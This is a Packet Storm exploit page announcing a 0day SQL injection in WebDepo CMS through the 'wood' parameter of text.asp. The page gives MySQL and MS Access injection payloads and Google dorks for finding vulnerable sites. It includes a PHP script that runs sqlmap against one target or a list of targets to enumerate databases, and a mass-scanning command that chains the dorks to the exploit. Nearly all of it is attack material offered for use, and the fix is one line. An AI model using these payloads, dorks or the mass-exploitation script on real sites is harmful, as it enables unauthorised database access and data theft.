exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebDepo CMS SQL Injection

WebDepo CMS SQL Injection
Posted Mar 29, 2015
Authored by Cleiton Pinheiro

WebDepo CMS suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | f56f63f5febb8cdd466c97568d2d801a1f2724b2c57e61fbaf91feeeb476dc43

WebDepo CMS SQL Injection

Change Mirror Download
Advisory: SQLi-vulnerabilities in aplication CMS WebDepo
Affected aplication web: Aplication CMS WebDepo (Release date: 28/03/2014)
Vendor URL: http://www.webdepot.co.il
Vendor Status: 0day

==========================
Vulnerability Description:
==========================

Records and client practice management application
CMS WebDepo suffers from multiple SQL injection vulnerabilitie

==========================
Technical Details:
==========================
SQL can be injected in the following GET
GET VULN: wood=(id)
$wood=intval($_REQUEST['wood'])

==========================
SQL injection vulnerabilities
==========================

Injection is possible through the file text.asp

Exploit-Example:

DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

DBMS: 'Microsoft Access'
Exploit:
+UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
FROM MSysAccessObjects%16

Ex: http://target.us/text.asp?wood=(id)+Exploit

==========================
SCRIPT EXPLOIT
==========================

http://pastebin.com/b6bWuw7k
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'

howto: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html

==========================
GOOGLE DORK
==========================

inurl:"text.asp?wood="
site:il inurl:"text.asp?wood="
site:com inurl:"text.asp?wood="

==========================
Solution:
==========================

Sanitizing all requests coming from the client

==========================
Credits:
==========================

AUTOR: Cleiton Pinheiro / Nick: googleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil

==========================
References:
==========================

[1] http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html
[2] https://msdn.microsoft.com/en-us/library/ff648339.aspx



Exploit:

<?php

/*

# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil


# EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection /
INURL BRASIL
# VENTOR: http://www.webdepot.co.il
# GET VULN: wood=(id)
# $wood=intval($_REQUEST['wood'])

-----------------------------------------------------------------------------

# DBMS: 'MySQL'
# Exploit: +AND+(SELECT 8880 FROM(SELECT
COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE
WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

# DBMS: 'Microsoft Access'
# Exploit:
+UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
FROM MSysAccessObjects%16

-----------------------------------------------------------------------------

# http://target.us/text.asp?wood=(id)+Exploit

# GOOGLE DORK: inurl:"text.asp?wood="
# GOOGLE DORK: site:il inurl:"text.asp?wood="
# GOOGLE DORK: site:com inurl:"text.asp?wood="
# --help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'

-----------------------------------------------------------------------------

# EXPLOIT MASS USE SCANNER INURLBR
# COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s
0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php
0dayWebDepo.php -t '_TARGET_'"
# DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR

-----------------------------------------------------------------------------

# TUTORIAL: http://blog.inurl.com.br/2015/03/0day-webdepo-sql-injection.html

*/


error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
$folder_SqlMap = "python ../sqlmap/sqlmap.py";
$op_ = getopt('f:t:p:', array('help::'));
echo "
_____
(_____) ____ _ _ _ _ _____ _ ____
_ _
(() ()) |_ _| \ | | | | | __ \| | | _ \
(_) |
\ / | | | \| | | | | |__) | | ______ | |_) |_ __ __ _ ___
_| |
\ / | | | . ` | | | | _ /| | |______| | _ <| '__/ _` / __|
| |
/=\ _| |_| |\ | |__| | | \ \| |____ | |_) | | | (_| \__ \
| |
[___] |_____|_| \_|\____/|_| \_\______| |____/|_|
\__,_|___/_|_|
\n\033[1;37m0xNeither war between hackers, nor peace for the system.\n
[+] [Exploit]: MINI 3xplo1t-SqlMap - (0DAY) WebDepo -SQL injection / INURL
BRASIL\nhelp: --help\033[0m\n\n";
$menu = "
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php 0dayWebDepo.php -t target
php 0dayWebDepo.php -f targets.txt
php 0dayWebDepo.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;

$params = array(
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ?
$op_['t'] : "http://{$op_['t']}") : NULL,
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ?
$op_['f'] : NULL,
'proxy' => not_isnull_empty($op_['p']) ? "--proxy '{$op_['p']}'" : NULL,
'folder' => $folder_SqlMap,
'line' =>
"-----------------------------------------------------------------------------------"
);

not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ?
exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __exec($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;

function not_isnull_empty($valor = NULL) {
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

function __plus() {
ob_flush();
flush();
}

function __listTarget($file) {
$tgt_ = array_unique(array_filter(explode("\n",
file_get_contents($file['file']))));
echo "\n\033[1;37m[!] [" . date("H:i:s") . "] [INFO] TOTAL TARGETS
LOADED : " . count($tgt_) . "\033[0m\n";
foreach ($tgt_ as $url) {
echo "\033[1;37m[+] [" . date("H:i:s") . "] [INFO] SCANNING :
{$url} \033[0m\n";
__plus();
$file['target'] = $url;
__exec($file) . __plus();
}
}

function __exec($params) {
__plus();
echo "\033[1;37m{$params['line']}\n[!] [" . date("H:i:s") . "] [INFO]
starting SqlMap...\n";
echo "[+] [" . date("H:i:s") . "] [INFO] TARGET:
{$params['target']}/text.asp?wood={SQL-INJECTION}\033[0m\n";
$command = "python ../sqlmap/sqlmap.py -u
'{$params['target']}/text.asp?wood=1' -p wood --batch --dbms=MySQL
{$params['proxy']} --random-agent --answers='follow=N' --dbs --level 2";
system($command, $dados) . empty($dados[0]) ? exit() : NULL;
__plus();
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close